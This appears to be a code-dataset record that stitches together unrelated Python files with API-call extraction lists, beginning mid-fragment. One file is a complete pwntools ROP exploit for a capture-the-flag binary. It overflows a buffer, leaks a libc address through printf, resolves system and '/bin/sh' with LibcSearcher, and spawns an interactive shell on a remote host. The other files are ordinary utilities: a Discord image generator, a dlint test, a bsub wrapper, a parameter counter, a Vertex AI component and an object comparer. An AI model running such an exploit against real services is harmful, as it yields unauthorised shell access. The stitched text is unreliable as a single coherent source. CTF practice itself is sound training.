solve_delta, solve_T, solve_t\n'), ((3845, 3877), 'Mstep_trans.solve_T', 'solve_T', (['y', 'x', 'P', 'params', 'config'], {}), '(y, x, P, params, config)\n', (3852, 3877), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((3892, 3924), 'Mstep_trans.solve_t', 'solve_t', (['y', 'x', 'P', 'params', 'config'], {}), '(y, x, P, params, config)\n', (3899, 3924), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((4252, 4267), 'numpy.ones', 'np.ones', (['(M, 1)'], {}), '((M, 1))\n', (4259, 4267), True, 'import numpy as np\n'), ((4276, 4291), 'numpy.ones', 'np.ones', (['(N, 1)'], {}), '((N, 1))\n', (4283, 4291), True, 'import numpy as np\n'), ((575, 590), 'numpy.ones', 'np.ones', (['(K, M)'], {}), '((K, M))\n', (582, 590), True, 'import numpy as np\n'), ((1218, 1229), 'numpy.zeros', 'np.zeros', (['D'], {}), '(D)\n', (1226, 1229), True, 'import numpy as np\n'), ((1601, 1622), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1607, 1622), True, 'import numpy as np\n'), ((1662, 1673), 'numpy.zeros', 'np.zeros', (['D'], {}), '(D)\n', (1670, 1673), True, 'import numpy as np\n'), ((3142, 3192), 'numpy.exp', 'np.exp', (['((-tmp1 - r * tmp2 - rs * tmp3) / 2 / sigsq)'], {}), '((-tmp1 - r * tmp2 - rs * tmp3) / 2 / sigsq)\n', (3148, 3192), True, 'import numpy as np\n'), ((1133, 1154), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1139, 1154), True, 'import numpy as np\n'), ((1992, 2013), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1998, 2013), True, 'import numpy as np\n'), ((2253, 2258), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (2255, 2258), True, 'from numpy import transpose as Tr\n'), ((2287, 2293), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (2289, 2293), True, 'from numpy import transpose as Tr\n'), ((2320, 2325), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (2322, 2325), True, 'from numpy import transpose as Tr\n'), ((3181, 
3199), 'numpy.finfo', 'np.finfo', (['np.float'], {}), '(np.float)\n', (3189, 3199), True, 'import numpy as np\n'), ((5108, 5131), 'numpy.log', 'np.log', (["params['sigsq']"], {}), "(params['sigsq'])\n", (5114, 5131), True, 'import numpy as np\n'), ((699, 715), 'numpy.power', 'np.power', (['tmp', '(2)'], {}), '(tmp, 2)\n', (707, 715), True, 'import numpy as np\n'), ((779, 788), 'numpy.eye', 'np.eye', (['D'], {}), '(D)\n', (785, 788), True, 'import numpy as np\n'), ((2562, 2568), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (2564, 2568), True, 'from numpy import transpose as Tr\n'), ((2602, 2608), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (2604, 2608), True, 'from numpy import transpose as Tr\n'), ((2639, 2645), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (2641, 2645), True, 'from numpy import transpose as Tr\n'), ((2884, 2890), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (2886, 2890), True, 'from numpy import transpose as Tr\n'), ((2924, 2930), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (2926, 2930), True, 'from numpy import transpose as Tr\n'), ((2961, 2967), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (2963, 2967), True, 'from numpy import transpose as Tr\n'), ((3215, 3232), 'numpy.sum', 'np.sum', (['P'], {'axis': '(1)'}), '(P, axis=1)\n', (3221, 3232), True, 'import numpy as np\n'), ((4469, 4482), 'numpy.dot', 'np.dot', (['P', 'IM'], {}), '(P, IM)\n', (4475, 4482), True, 'import numpy as np\n'), ((4623, 4629), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (4625, 4629), True, 'from numpy import transpose as Tr\n'), ((4517, 4522), 'numpy.transpose', 'Tr', (['P'], {}), '(P)\n', (4519, 4522), True, 'from numpy import transpose as Tr\n'), ((4574, 4579), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (4576, 4579), True, 'from numpy import transpose as Tr\n'), ((4423, 4432), 'numpy.eye', 'np.eye', (['D'], {}), '(D)\n', (4429, 4432), True, 'import numpy as np\n'), ((4598, 4604), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (4600, 4604), True, 'from numpy import transpose as Tr\n'), ((4780, 4786), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (4782, 4786), True, 'from numpy import transpose as Tr\n'), ((4930, 4936), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (4932, 4936), True, 'from numpy import transpose as Tr\n'), ((4729, 4735), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (4731, 4735), True, 'from numpy import transpose as Tr\n'), ((4879, 4885), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (4881, 4885), True, 'from numpy import transpose as Tr\n'), ((5027, 5061), 'numpy.linalg.norm', 'np.linalg.norm', (["params['t']", '"""fro"""'], {}), "(params['t'], 'fro')\n", (5041, 5061), True, 'import numpy as np\n'), ((4755, 4761), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (4757, 4761), True, 'from numpy import transpose as Tr\n'), ((4905, 4911), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (4907, 4911), True, 'from numpy import transpose as Tr\n')]
|
from pwn import *
from LibcSearcher import LibcSearcher
############################
#******** set the target file name ********
############################
file_name = 'babyrop2'
port = 27150
io = -1
########### set the flags ###########
DEBUG = 1
LOG_PRINT = 1
TMUX = 0
def LOG_ADDR_SUCCESS(name:str, addr:int):
'''
    Print an address
    name: variable name, str
    addr: address, int
'''
global LOG_PRINT
if LOG_PRINT:
log.success('{} ===> {}'.format(name, hex(addr)))
def LOG_SUCCESS(info):
'''
    Print a message
'''
if LOG_PRINT:
log.success(info)
def Get_Str_Addr(target_addr:str):
"""
    Get the address of a string
"""
global io
return io.search(target_addr.encode()).__next__()
if DEBUG: # exploit locally
io = process('./{}'.format(file_name))
if TMUX:
context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(io, gdbscript='b *0x80489a\nc\n')
else: # exploit remotely
io = remote('node3.buuoj.cn', port)
io_elf = ELF('./{}'.format(file_name))
log.success("libc used ===> {}".format(io_elf.libc))
context.log_level = 'debug'
log.success('='*100)
########################## exploit code below #######################
########################## exploit code below #######################
main_addr = io_elf.sym['main']
printf_plt_addr = io_elf.plt['printf']
libc_start_main_got = io_elf.got['__libc_start_main']
pop_rdi_ret = 0x400733
pop_rsi_r15 = 0x400731
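# the pop_rsi_r15 gadget also pops r15, so the chain below pads it with a dummy 0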
# On 64-bit, unlike 32-bit, a format string is needed to leak the GOT entry via printf!!
# The 64-bit ROP chain may also need to keep the stack aligned, hence the extra ret gadget!!!
format_str_addr = 0x400770
ret_addr = 0x4004d1
LOG_ADDR_SUCCESS('main_addr', main_addr)
LOG_ADDR_SUCCESS('printf_plt_addr', printf_plt_addr)
LOG_ADDR_SUCCESS('libc_start_main_got', libc_start_main_got)
#
io.recvuntil("What's your name? ")
# leak the libc base address via printf
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(format_str_addr) + p64(pop_rsi_r15) + p64(libc_start_main_got) + p64(0) + p64(printf_plt_addr) +p64(ret_addr) + p64(main_addr)
io.sendline(payload)
message = io.recv()
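# a userland libc address is 6 bytes ending in 0x7f (little-endian), so take the 6 bytes up to and including the marker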
index = message.index(b'\x7f')
libc_start_main_addr = message[index - 5: index + 1]
libc_start_main_addr = u64(libc_start_main_addr.ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libc_base_addr = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libc_base_addr + libc.dump('system')
str_bin_sh = libc_base_addr + libc.dump('str_bin_sh')
LOG_ADDR_SUCCESS('libc_start_main_addr', libc_start_main_addr)
LOG_ADDR_SUCCESS('libc_base_addr', libc_base_addr)
LOG_ADDR_SUCCESS('sytem_addr', system_addr)
LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh)
# io.recv()
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(ret_addr) + p64(main_addr)
io.sendline(payload)
# io.recvuntil('bytes of data!\n')
io.interactive()
|
[
"LibcSearcher.LibcSearcher"
] |
[((2041, 2096), 'LibcSearcher.LibcSearcher', 'LibcSearcher', (['"""__libc_start_main"""', 'libc_start_main_addr'], {}), "('__libc_start_main', libc_start_main_addr)\n", (2053, 2096), False, 'from LibcSearcher import LibcSearcher\n')]
|
import io
import json
import math
import random
import time
import traceback
from datetime import datetime
import aiofiles
import discord
import sanic
import sanic.response
from PIL import Image
from discord.ext import commands
from modules import leaks
async def handler(req):
return sanic.response.json(json.loads(await (await aiofiles.open(f'Cache/data/resp_leaks.json', mode='r')).read()))
async def generateleaks(data: dict, client: commands.Bot):
await (await aiofiles.open('Cache/data/leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
start = time.time()
files = [await leaks.GenerateCard(i) for i in data["data"]["items"]]
if not files:
raise FileNotFoundError("No Images")
await client.get_channel(735018804169670687).send(f"New Leaks detected")
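    # lay the cards out on a roughly square grid; each cell is 305x550 px (the thumbnail size used below)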
result = Image.new("RGBA", (
round(math.sqrt(len(files)) + 0.45) * 305 - 5, round(math.sqrt(len(files))) * 550 - 5))
result.paste(Image.open("assets/Images/Backgrounds/Background.png").resize(
(
int(round(math.sqrt(len(files)) + 0.45) * 305 - 5),
int(round(math.sqrt(len(files)) + 0.45) * 550 - 5)),
Image.ANTIALIAS))
x = -305
y = 0
count = 0
for img in files:
try:
img.thumbnail((305, 550), Image.ANTIALIAS)
w, h = img.size
if count >= round(math.sqrt(len(files)) + 0.45):
y += 550
x = -305
count = 0
x += 305
count += 1
result.paste(img, (x, y, x + w, y + h))
except:
continue
result.save("cdn/current/leaks.png", optimized=True)
uniqueimage = str(time.time())
result.save(f"cdn/unique/leaks_{uniqueimage}.png", optimize=True)
buffered = io.BytesIO()
result.save(buffered, format="PNG")
buffered.seek(0)
data = {
"url": "https://api.peely.de/cdn/current/leaks.png",
"uniqueurl": f"https://api.peely.de/cdn/unique/leaks_{uniqueimage}.png",
"time": str(datetime.utcnow().__format__('%A, %B %d, %Y'))
}
await (await aiofiles.open('Cache/data/resp_leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
await client.get_channel(735018804169670687).send(
f"Updated Leaks. Generating Image in {round(time.time() - start, 2)}sec")
|
[
"io.BytesIO",
"aiofiles.open",
"modules.leaks.GenerateCard",
"PIL.Image.open",
"json.dumps",
"time.time",
"datetime.datetime.utcnow"
] |
[((586, 597), 'time.time', 'time.time', ([], {}), '()\n', (595, 597), False, 'import time\n'), ((1787, 1799), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (1797, 1799), False, 'import io\n'), ((1689, 1700), 'time.time', 'time.time', ([], {}), '()\n', (1698, 1700), False, 'import time\n'), ((546, 572), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)'}), '(data, indent=2)\n', (556, 572), False, 'import json\n'), ((617, 638), 'modules.leaks.GenerateCard', 'leaks.GenerateCard', (['i'], {}), '(i)\n', (635, 638), False, 'from modules import leaks\n'), ((2177, 2203), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)'}), '(data, indent=2)\n', (2187, 2203), False, 'import json\n'), ((957, 1011), 'PIL.Image.open', 'Image.open', (['"""assets/Images/Backgrounds/Background.png"""'], {}), "('assets/Images/Backgrounds/Background.png')\n", (967, 1011), False, 'from PIL import Image\n'), ((480, 529), 'aiofiles.open', 'aiofiles.open', (['"""Cache/data/leaks.json"""'], {'mode': '"""w+"""'}), "('Cache/data/leaks.json', mode='w+')\n", (493, 529), False, 'import aiofiles\n'), ((2036, 2053), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2051, 2053), False, 'from datetime import datetime\n'), ((2106, 2160), 'aiofiles.open', 'aiofiles.open', (['"""Cache/data/resp_leaks.json"""'], {'mode': '"""w+"""'}), "('Cache/data/resp_leaks.json', mode='w+')\n", (2119, 2160), False, 'import aiofiles\n'), ((337, 391), 'aiofiles.open', 'aiofiles.open', (['f"""Cache/data/resp_leaks.json"""'], {'mode': '"""r"""'}), "(f'Cache/data/resp_leaks.json', mode='r')\n", (350, 391), False, 'import aiofiles\n'), ((2312, 2323), 'time.time', 'time.time', ([], {}), '()\n', (2321, 2323), False, 'import time\n')]
|
#!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
class TestBadSysUse(dlint.test.base.BaseTest):
def test_bad_sys_usage(self):
python_string = self.get_ast_node(
"""
import sys
sys.call_tracing(lambda: 42, ())
sys.setprofile(lambda: 42)
sys.settrace(lambda: 42)
"""
)
linter = dlint.linters.BadSysUseLinter()
linter.visit(python_string)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=4,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=5,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
]
assert result == expected
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"dlint.linters.base.Flake8Result",
"dlint.linters.BadSysUseLinter"
] |
[((1242, 1257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1255, 1257), False, 'import unittest\n'), ((490, 521), 'dlint.linters.BadSysUseLinter', 'dlint.linters.BadSysUseLinter', ([], {}), '()\n', (519, 521), False, 'import dlint\n'), ((630, 741), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(4)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=4, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (661, 741), False, 'import dlint\n'), ((812, 923), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(5)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=5, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (843, 923), False, 'import dlint\n'), ((994, 1105), 'dlint.linters.base.Flake8Result', 'dlint.linters.base.Flake8Result', ([], {'lineno': '(6)', 'col_offset': '(0)', 'message': 'dlint.linters.BadSysUseLinter._error_tmpl'}), '(lineno=6, col_offset=0, message=dlint.\n linters.BadSysUseLinter._error_tmpl)\n', (1025, 1105), False, 'import dlint\n')]
|
#!/usr/bin/env python
"""Wrapper script with bsub functionality."""
from __future__ import print_function
import sys
import os
import shlex
import argparse
from submitjob import submitjob
from utility import color
def esub(args, bsubargs, jobscript):
"""Wrapper script with bsub functionality."""
data = {"command": ""}
scriptargs = []
for line in jobscript.splitlines(True):
if line.startswith("#!"):
data["command"] += line
elif line.startswith("#BSUB "):
scriptargs += shlex.split(line[6:].split("#")[0])
else:
data["command"] += line.split("#")[0]
bsubargs = scriptargs + bsubargs
last = False
cmd = False
for arg in bsubargs:
if cmd:
data["command"] += " " + arg
continue
if arg[0] == "-":
if last:
data[last] = True
last = arg
else:
if last:
data[last] = arg
last = False
else:
cmd = True
data["command"] = arg
if last:
data[last] = True
try:
jobid = submitjob(data)
print(jobid)
except Exception as e:
print(color(e.strerror, "r"))
sys.exit(-1)
def main():
"""Main program entry point."""
parser = argparse.ArgumentParser(
description="Wrapper for bsub."
)
parser.add_argument_group("further arguments",
description="are passed to bsub")
args, bsubargs = parser.parse_known_args()
jobscript = sys.stdin.read()
try:
esub(args, bsubargs, jobscript)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
[
"sys.stdin.read",
"argparse.ArgumentParser",
"utility.color",
"submitjob.submitjob",
"sys.exit"
] |
[((1340, 1396), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Wrapper for bsub."""'}), "(description='Wrapper for bsub.')\n", (1363, 1396), False, 'import argparse\n'), ((1591, 1607), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (1605, 1607), False, 'import sys\n'), ((1154, 1169), 'submitjob.submitjob', 'submitjob', (['data'], {}), '(data)\n', (1163, 1169), False, 'from submitjob import submitjob\n'), ((1264, 1276), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1272, 1276), False, 'import sys\n'), ((1232, 1254), 'utility.color', 'color', (['e.strerror', '"""r"""'], {}), "(e.strerror, 'r')\n", (1237, 1254), False, 'from utility import color\n')]
|
import argparse
import numpy as np
import models
from utils import set_arch_name
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
def config():
r"""configuration settings
"""
parser = argparse.ArgumentParser(description='Check model parameters')
parser.add_argument('-a', '--arch', metavar='ARCH', default='mobilenet',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: mobilenet)')
parser.add_argument('--layers', default=16, type=int, metavar='N',
help='number of layers in VGG/ResNet/ResNeXt/WideResNet (default: 16)')
parser.add_argument('--bn', '--batch-norm', dest='bn', action='store_true',
help='Use batch norm in VGG?')
parser.add_argument('--width-mult', default=1.0, type=float, metavar='WM',
help='width multiplier to thin a network '
'uniformly at each layer (default: 1.0)')
# for calculating number of pwkernel slice
parser.add_argument('-pwd', '--pw-bind-size', default=8, type=int, metavar='N',
dest='pw_bind_size',
help='the number of binding channels in pointwise convolution '
'(subvector size) (default: 8)')
cfg = parser.parse_args()
return cfg
def main():
opt = config()
# set model name
arch_name = set_arch_name(opt)
# calculate number of pwkernel slice
# model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# w_kernel = model.get_weights_conv(use_cuda=False)
# for i in range(len(w_kernel)):
# print(np.shape(w_kernel[i]))
# w_pwkernel = model.get_weights_pwconv(use_cuda=False)
# d = opt.pw_bind_size
# sum_slices = 0
# sum_num_weights = 0
# for i in range(len(w_pwkernel)):
# c_out, c_in, _, _ = np.shape(w_pwkernel[i])
# num_weights = c_out * c_in
# sum_num_weights += num_weights
# if i == 0:
# num_slice = c_out * (c_in - d + 1)
# else:
# num_slice = c_out * (c_in // d)
# sum_slices += num_slice
# print('[{}-th layer] #weights: {} / #slices: {}'.format(i, num_weights, num_slice))
# print('\ntotal #weights: {} / total #slices (except ref_layer): {}'.format(sum_num_weights, sum_slices))
print('\n[ {}-cifar10 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of all trainable parameters: ', num_trainable_params)
print('\n[ {}-cifar100 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar100', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of trainable parameters: ', num_trainable_params)
# print('\n[ {}-imagenet parameters ]'.format(arch_name))
# model = models.__dict__[opt.arch](data='imagenet', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
# num_params = sum(p.numel() for p in model.parameters())
# num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
# print('Number of all parameters: ', num_params)
# print('Number of trainable parameters: ', num_trainable_params)
if __name__ == '__main__':
main()
|
[
"utils.set_arch_name",
"argparse.ArgumentParser"
] |
[((297, 358), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Check model parameters"""'}), "(description='Check model parameters')\n", (320, 358), False, 'import argparse\n'), ((1605, 1623), 'utils.set_arch_name', 'set_arch_name', (['opt'], {}), '(opt)\n', (1618, 1623), False, 'from utils import set_arch_name\n')]
|
from django.shortcuts import render
from .models import InfoPage
# Create your views here.
def view_page(request, slug):
# Look up the slug.
page = InfoPage.objects.get(slug=slug)
page_data = {
"page": page
}
return render(request, 'infopages/view_page.html', page_data)
|
[
"django.shortcuts.render"
] |
[((244, 298), 'django.shortcuts.render', 'render', (['request', '"""infopages/view_page.html"""', 'page_data'], {}), "(request, 'infopages/view_page.html', page_data)\n", (250, 298), False, 'from django.shortcuts import render\n')]
|
"""
This component launches a Batch Prediction job on Vertex AI.
To learn more about Vertex AI Batch Prediction jobs, see:
https://cloud.google.com/vertex-ai/docs/predictions/batch-predictions.
"""
from google.cloud import storage
from tfx.dsl.component.experimental.annotations import Parameter, InputArtifact
from tfx.dsl.component.experimental.decorators import component
from tfx.types.standard_artifacts import String
import google.cloud.aiplatform as vertex_ai
from absl import logging
@component
def BatchPredictionGen(
gcs_source: InputArtifact[String],
project: Parameter[str],
location: Parameter[str],
model_resource_name: Parameter[str],
job_display_name: Parameter[str],
gcs_destination: Parameter[str],
instances_format: Parameter[str] = "file-list",
machine_type: Parameter[str] = "n1-standard-2",
accelerator_count: Parameter[int] = 0,
accelerator_type: Parameter[str] = None,
starting_replica_count: Parameter[int] = 1,
max_replica_count: Parameter[int] = 1,
):
"""
gcs_source: A location inside GCS to be used by the Batch Prediction job to get its inputs.
Rest of the parameters are explained here: https://git.io/JiUyU.
"""
storage_client = storage.Client()
# Read GCS Source (gcs_source contains the full path of GCS object).
# 1-1. get bucketname from gcs_source
gcs_source_uri = gcs_source.uri.split("//")[1:][0].split("/")
bucketname = gcs_source_uri[0]
bucket = storage_client.get_bucket(bucketname)
logging.info(f"bucketname: {bucketname}")
# 1-2. get object path without the bucket name.
objectpath = "/".join(gcs_source_uri[1:])
# 1-3. read the object to get value set by OutputArtifact from FileListGen.
blob = bucket.blob(objectpath)
logging.info(f"objectpath: {objectpath}")
gcs_source = f"gs://{blob.download_as_text()}"
# Get Model.
vertex_ai.init(project=project, location=location)
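    # NOTE: Model.list() appears to return results ordered by update_time ascending, so [-1] is the newest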
model = vertex_ai.Model.list(
filter=f"display_name={model_resource_name}", order_by="update_time"
)[-1]
# Launch a Batch Prediction job.
logging.info("Starting batch prediction job.")
logging.info(f"GCS path where file list is: {gcs_source}")
batch_prediction_job = model.batch_predict(
job_display_name=job_display_name,
instances_format=instances_format,
gcs_source=gcs_source,
gcs_destination_prefix=gcs_destination,
machine_type=machine_type,
accelerator_count=accelerator_count,
accelerator_type=accelerator_type,
starting_replica_count=starting_replica_count,
max_replica_count=max_replica_count,
sync=True,
)
logging.info(batch_prediction_job.display_name)
logging.info(batch_prediction_job.resource_name)
logging.info(batch_prediction_job.state)
|
[
"absl.logging.info",
"google.cloud.aiplatform.init",
"google.cloud.storage.Client",
"google.cloud.aiplatform.Model.list"
] |
[((1235, 1251), 'google.cloud.storage.Client', 'storage.Client', ([], {}), '()\n', (1249, 1251), False, 'from google.cloud import storage\n'), ((1524, 1565), 'absl.logging.info', 'logging.info', (['f"""bucketname: {bucketname}"""'], {}), "(f'bucketname: {bucketname}')\n", (1536, 1565), False, 'from absl import logging\n'), ((1785, 1826), 'absl.logging.info', 'logging.info', (['f"""objectpath: {objectpath}"""'], {}), "(f'objectpath: {objectpath}')\n", (1797, 1826), False, 'from absl import logging\n'), ((1901, 1951), 'google.cloud.aiplatform.init', 'vertex_ai.init', ([], {'project': 'project', 'location': 'location'}), '(project=project, location=location)\n', (1915, 1951), True, 'import google.cloud.aiplatform as vertex_ai\n'), ((2115, 2161), 'absl.logging.info', 'logging.info', (['"""Starting batch prediction job."""'], {}), "('Starting batch prediction job.')\n", (2127, 2161), False, 'from absl import logging\n'), ((2166, 2224), 'absl.logging.info', 'logging.info', (['f"""GCS path where file list is: {gcs_source}"""'], {}), "(f'GCS path where file list is: {gcs_source}')\n", (2178, 2224), False, 'from absl import logging\n'), ((2691, 2738), 'absl.logging.info', 'logging.info', (['batch_prediction_job.display_name'], {}), '(batch_prediction_job.display_name)\n', (2703, 2738), False, 'from absl import logging\n'), ((2743, 2791), 'absl.logging.info', 'logging.info', (['batch_prediction_job.resource_name'], {}), '(batch_prediction_job.resource_name)\n', (2755, 2791), False, 'from absl import logging\n'), ((2796, 2836), 'absl.logging.info', 'logging.info', (['batch_prediction_job.state'], {}), '(batch_prediction_job.state)\n', (2808, 2836), False, 'from absl import logging\n'), ((1964, 2059), 'google.cloud.aiplatform.Model.list', 'vertex_ai.Model.list', ([], {'filter': 'f"""display_name={model_resource_name}"""', 'order_by': '"""update_time"""'}), "(filter=f'display_name={model_resource_name}', order_by\n ='update_time')\n", (1984, 2059), True, 'import google.cloud.aiplatform as vertex_ai\n')]
|
# ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""compare.py
Return True if the attributes of entity lhs equal those of entity rhs.
"""
import logging
from enum import Enum
from ydk.types import (Empty, Decimal64, FixedBitsDict,
YList, YListItem, YLeafList)
import sys
if sys.version_info > (3,):
long = int
LOGGER = logging.getLogger('ydk.tests.unittest')
LOGGER.setLevel(logging.DEBUG)
def is_builtin_type(attr):
    # all the derived types should have __cmp__ implemented
if (isinstance(attr, (int, bool, dict, str, int, long, float)) or
isinstance(attr, (Enum, Empty, Decimal64, FixedBitsDict)) or
isinstance(attr, (YLeafList, YListItem))):
return True
else:
return False
class ErrNo(Enum):
WRONG_VALUE = 0
WRONG_TYPES = 1
POPULATION_FAILED = 2
WRONG_DICT = 3
WRONG_DICT_VALUE = 4
WRONG_CLASS = 5
class ErrorMsg(object):
def __init__(self, lhs, rhs, errno):
self.lhs = lhs
self.rhs = rhs
self.errno = errno
def __str__(self):
rhs, lhs, errno = self.rhs, self.lhs, self.errno
errlhs = "\tlhs = %s, type: %s;\n" % (str(lhs), type(lhs))
errrhs = "\trhs = %s, type: %s;\n" % (str(rhs), type(rhs))
if errno == ErrNo.WRONG_VALUE:
errtyp = "Wrong value:\n"
elif errno == ErrNo.WRONG_TYPES:
errtyp = "Wrong types: not comparable\n"
elif errno == ErrNo.WRONG_CLASS:
errtyp = "Wrong types:\n"
elif errno == ErrNo.POPULATION_FAILED:
errtyp = "Failed population:\n"
        elif errno == ErrNo.WRONG_DICT:
            errtyp = "Wrong dict: different dictionary key\n"
        else:
            errtyp = "Wrong dict value:\n"
        return ''.join([errtyp, errlhs, errrhs])
def print_err(self):
error_str = str(self)
LOGGER.debug(error_str)
def is_equal(lhs, rhs):
ret, errtyp = True, None
if lhs is None and rhs is None or \
isinstance(lhs, list) and isinstance(rhs, list) and not lhs and not rhs:
pass
elif is_builtin_type(lhs) or is_builtin_type(rhs):
try:
if lhs != rhs and not _equal_enum(lhs, rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif lhs is None or rhs is None:
errtyp, ret = ErrNo.POPULATION_FAILED, False
elif isinstance(lhs, YList) and isinstance(rhs, YList) or \
isinstance(lhs, list) and isinstance(rhs, list):
if len(lhs) != len(rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
else:
cmp_lst = list(zip(lhs, rhs))
ret = True
for (left, right) in cmp_lst:
                ret &= is_equal(left, right)
elif lhs.__class__ != rhs.__class__:
errtyp, ret = ErrNo.WRONG_CLASS, False
else:
dict_lhs, dict_rhs = lhs.__dict__, rhs.__dict__
len_lhs = len(dict_lhs)
len_rhs = len(dict_rhs)
if 'i_meta' in dict_lhs:
len_lhs -= 1
if 'i_meta' in dict_rhs:
len_rhs -= 1
if len_lhs != len_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
for k in dict_lhs:
if k == 'parent' or k == 'i_meta':
continue
elif is_builtin_type(dict_lhs[k]) or is_builtin_type(dict_rhs[k]):
try:
if dict_lhs[k] != dict_rhs[k] and not _equal_enum(dict_lhs[k], dict_rhs[k]):
lhs = dict_lhs[k]
rhs = dict_rhs[k]
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif k not in dict_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
elif not is_equal(dict_lhs[k], dict_rhs[k]):
ret = False
if ret is False and errtyp is not None:
err_msg = ErrorMsg(rhs, lhs, errtyp)
err_msg.print_err()
return ret
def _equal_enum(rhs, lhs):
return all((isinstance(rhs, Enum),
isinstance(lhs, Enum),
rhs.name == lhs.name))
|
[
"logging.getLogger"
] |
